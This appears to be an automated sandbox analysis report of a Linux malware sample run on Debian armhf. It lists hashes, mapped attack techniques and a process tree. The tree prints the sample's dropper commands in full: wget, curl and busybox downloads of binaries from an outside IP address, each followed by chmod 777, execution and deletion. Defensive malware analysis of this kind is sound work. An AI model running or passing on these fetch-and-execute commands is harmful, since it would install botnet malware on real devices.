Analysis
-
max time kernel
45s -
max time network
76s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09-11-2024 16:23
Static task
static1
Behavioral task
behavioral1
Sample
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
Resource
debian9-mipsel-20240611-en
General
-
Target
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
-
Size
10KB
-
MD5
17fadac61f699e8688b92fa8096ee980
-
SHA1
83b7df16777df7eb876af7062643a8d30cddb2ca
-
SHA256
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8b
-
SHA512
59ce1a1990e0f04de41aac37d50304d031af6b8f68ad765cdb43e9ebfc5bb1b29ed072b24adf1cfa3c505e8bd4bef1c219324a8941fd95166688ed33e590aedd
-
SSDEEP
192:+iVAFfHv6mhWd19zxz5zN2KBd2fHv6mS1Pzxz5zN2K1:+iVAFfHv6mhWdPdlN2KBd2fHv6mShdlX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 673 chmod 716 chmod 738 chmod 800 chmod 841 chmod 835 chmod 847 chmod 855 chmod 861 chmod 867 chmod 691 chmod 794 chmod 806 chmod 812 chmod 820 chmod 759 chmod 780 chmod 786 chmod 829 chmod 873 chmod -
Executes dropped EXE 20 IoCs
Processes:
Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5ppqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWYp7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNpY3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQOCuxEGmaojd5yxu81G3tEjnF17QChWrXZvktMzOTGU5viRhlyCISkxBFzQNvTZBftm1nSS5DFRTHTeId6MC1OsaykfRC5cK3vdT6ZqxNISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBrMTlIirGKPb0g4OKsaUQYzJG4z3T6D155jOuknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZoKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9NusSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQOCuxEGmaojd5yxu81G3tEjnF17QChWrXZvkdxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWYp7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNpY3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nSioc pid process /tmp/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p 674 Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p /tmp/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5 693 pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5 /tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY 719 dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY /tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp 739 p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp /tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 760 Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 /tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO 781 usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO /tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk 787 CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk /tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS 795 tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS /tmp/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx 801 S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx /tmp/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr 807 NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr /tmp/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO 813 MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO /tmp/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs 821 uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs /tmp/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ 830 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ /tmp/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N 836 oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N /tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO 842 usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO /tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk 848 CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk /tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY 856 dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY /tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp 862 p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp /tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 868 Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 /tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS 874 tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS -
Checks CPU configuration 1 TTPs 20 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ curl File opened for modification /tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO curl File opened for modification /tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp curl File opened for modification /tmp/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5 curl File opened for modification /tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY curl File opened for modification /tmp/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO curl File opened for modification /tmp/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr curl File opened for modification /tmp/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs curl File opened for modification /tmp/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N curl File opened for modification /tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY curl File opened for modification /tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS curl File opened for modification /tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp curl File opened for modification /tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 curl File opened for modification /tmp/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx curl File opened for modification /tmp/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p curl File opened for modification /tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO curl File opened for modification /tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk curl File opened for modification /tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS curl File opened for modification /tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk curl File opened for modification /tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 curl
Processes
-
/tmp/bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN/tmp/bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN1⤵PID:642
-
/bin/rm/bin/rm bins.sh2⤵PID:644
-
/usr/bin/wgetwget http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:646
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:664 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:671
-
/bin/chmodchmod 777 Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- File and Directory Permissions Modification
PID:673 -
/tmp/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p./Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- Executes dropped EXE
PID:674 -
/bin/rmrm Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:675
-
/usr/bin/wgetwget http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:676
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:677 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:686
-
/bin/chmodchmod 777 pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- File and Directory Permissions Modification
PID:691 -
/tmp/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5./pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- Executes dropped EXE
PID:693 -
/bin/rmrm pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:694
-
/usr/bin/wgetwget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:695
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:702 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:710
-
/bin/chmodchmod 777 dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- File and Directory Permissions Modification
PID:716 -
/tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY./dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- Executes dropped EXE
PID:719 -
/bin/rmrm dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:721
-
/usr/bin/wgetwget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:722
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:731 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:737
-
/bin/chmodchmod 777 p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- File and Directory Permissions Modification
PID:738 -
/tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp./p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- Executes dropped EXE
PID:739 -
/bin/rmrm p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:740
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:741
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:745 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:753
-
/bin/chmodchmod 777 Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- File and Directory Permissions Modification
PID:759 -
/tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7./Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- Executes dropped EXE
PID:760 -
/bin/rmrm Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:761
-
/usr/bin/wgetwget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:763
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:770 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:779
-
/bin/chmodchmod 777 usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- File and Directory Permissions Modification
PID:780 -
/tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO./usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- Executes dropped EXE
PID:781 -
/bin/rmrm usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:782
-
/usr/bin/wgetwget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:783
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:784 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:785
-
/bin/chmodchmod 777 CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- File and Directory Permissions Modification
PID:786 -
/tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk./CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- Executes dropped EXE
PID:787 -
/bin/rmrm CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:788
-
/usr/bin/wgetwget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:789
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:790 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:793
-
/bin/chmodchmod 777 tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- File and Directory Permissions Modification
PID:794 -
/tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS./tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- Executes dropped EXE
PID:795 -
/bin/rmrm tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:796
-
/usr/bin/wgetwget http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:797
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:798 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:799
-
/bin/chmodchmod 777 S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- File and Directory Permissions Modification
PID:800 -
/tmp/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx./S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- Executes dropped EXE
PID:801 -
/bin/rmrm S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:802
-
/usr/bin/wgetwget http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:803
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:804 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:805
-
/bin/chmodchmod 777 NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- File and Directory Permissions Modification
PID:806 -
/tmp/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr./NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- Executes dropped EXE
PID:807 -
/bin/rmrm NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:808
-
/usr/bin/wgetwget http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:809
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:810 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:811
-
/bin/chmodchmod 777 MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- File and Directory Permissions Modification
PID:812 -
/tmp/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO./MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- Executes dropped EXE
PID:813 -
/bin/rmrm MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:814
-
/usr/bin/wgetwget http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:815
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:818 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:819
-
/bin/chmodchmod 777 uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- File and Directory Permissions Modification
PID:820 -
/tmp/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs./uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- Executes dropped EXE
PID:821 -
/bin/rmrm uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:822
-
/usr/bin/wgetwget http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:823
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:828
-
/bin/chmodchmod 777 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- File and Directory Permissions Modification
PID:829 -
/tmp/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ./4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- Executes dropped EXE
PID:830 -
/bin/rmrm 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:831
-
/usr/bin/wgetwget http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:832
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:834
-
/bin/chmodchmod 777 oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- File and Directory Permissions Modification
PID:835 -
/tmp/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N./oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- Executes dropped EXE
PID:836 -
/bin/rmrm oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:837
-
/usr/bin/wgetwget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:838
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:840
-
/bin/chmodchmod 777 usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- File and Directory Permissions Modification
PID:841 -
/tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO./usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- Executes dropped EXE
PID:842 -
/bin/rmrm usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:843
-
/usr/bin/wgetwget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:844
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:846
-
/bin/chmodchmod 777 CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- File and Directory Permissions Modification
PID:847 -
/tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk./CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- Executes dropped EXE
PID:848 -
/bin/rmrm CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:849
-
/usr/bin/wgetwget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:850
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:852 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:854
-
/bin/chmodchmod 777 dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- File and Directory Permissions Modification
PID:855 -
/tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY./dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- Executes dropped EXE
PID:856 -
/bin/rmrm dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:857
-
/usr/bin/wgetwget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:858
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:859 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:860
-
/bin/chmodchmod 777 p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- File and Directory Permissions Modification
PID:861 -
/tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp./p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- Executes dropped EXE
PID:862 -
/bin/rmrm p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:863
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:864
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:865 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:866
-
/bin/chmodchmod 777 Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- File and Directory Permissions Modification
PID:867 -
/tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7./Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- Executes dropped EXE
PID:868 -
/bin/rmrm Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:869
-
/usr/bin/wgetwget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:870
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:871 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:872
-
/bin/chmodchmod 777 tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- File and Directory Permissions Modification
PID:873 -
/tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS./tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- Executes dropped EXE
PID:874 -
/bin/rmrm tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:875
-
